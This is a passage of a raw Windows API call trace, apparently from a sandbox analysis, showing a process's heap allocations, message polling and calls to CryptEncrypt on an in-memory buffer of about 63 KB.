(in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.016] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0267.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0267.016] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.016] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0267.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0267.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0267.016] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0267.016] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.016] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.016] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0267.016] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.016] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.017] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.017] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.018] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0267.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51d00, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0267.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0267.019] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0267.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0267.019] CryptEncrypt (in: hKey=0xa872d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xf68f, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xf690) returned 1 [0267.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0267.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0267.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0267.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0267.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0267.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0267.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0267.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0267.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0267.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55278 [0267.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0267.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55278 | out: hHeap=0x970000) returned 1 [0267.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0267.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0267.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0267.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55188 [0267.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0267.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55188 | out: hHeap=0x970000) returned 1 [0267.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0267.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0267.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0267.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0267.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0267.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0267.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0267.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0267.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0267.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0267.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0267.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0267.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0267.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0267.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0267.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0267.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0267.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0267.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0267.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552d8 | out: hHeap=0x970000) returned 1 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0267.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0267.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0267.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551c8 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0267.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0267.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0267.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d90 [0267.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0267.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0267.022] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0267.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.031] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0267.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0267.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0267.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0267.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0267.031] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0267.032] CharLowerBuffW (in: lpsz="byte[63120]", cchLength=0xb | out: lpsz="byte[63120]") returned 0xb [0267.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0267.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0267.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0267.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0267.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0267.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0267.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.032] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0267.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977938 [0267.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0267.032] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0267.034] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0267.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0267.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0267.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0267.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0267.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0267.034] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.035] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0267.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0267.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0267.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0267.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0267.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51e50 [0267.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51e50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0267.036] CryptEncrypt (in: hKey=0xa872d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe50048*, pdwDataLen=0x8cef60*=0xf68f, dwBufLen=0xf690 | out: pbData=0xe50048*, pdwDataLen=0x8cef60*=0xf690) returned 1 [0267.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f155c8 [0267.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0267.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55158 [0267.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0267.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0267.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0267.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0267.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0267.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0267.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0267.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0267.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0267.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0267.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0267.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0267.039] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0267.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551a8 [0267.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0267.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0267.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0267.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0267.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552b8 [0267.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552b8 | out: hHeap=0x970000) returned 1 [0267.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0267.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0267.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0267.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551b8 [0267.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0267.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0267.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0267.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0267.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0267.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0267.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55208 [0267.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0267.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55208 | out: hHeap=0x970000) returned 1 [0267.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0267.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0267.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0267.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0267.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0267.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0267.041] RtlAllocateHeap 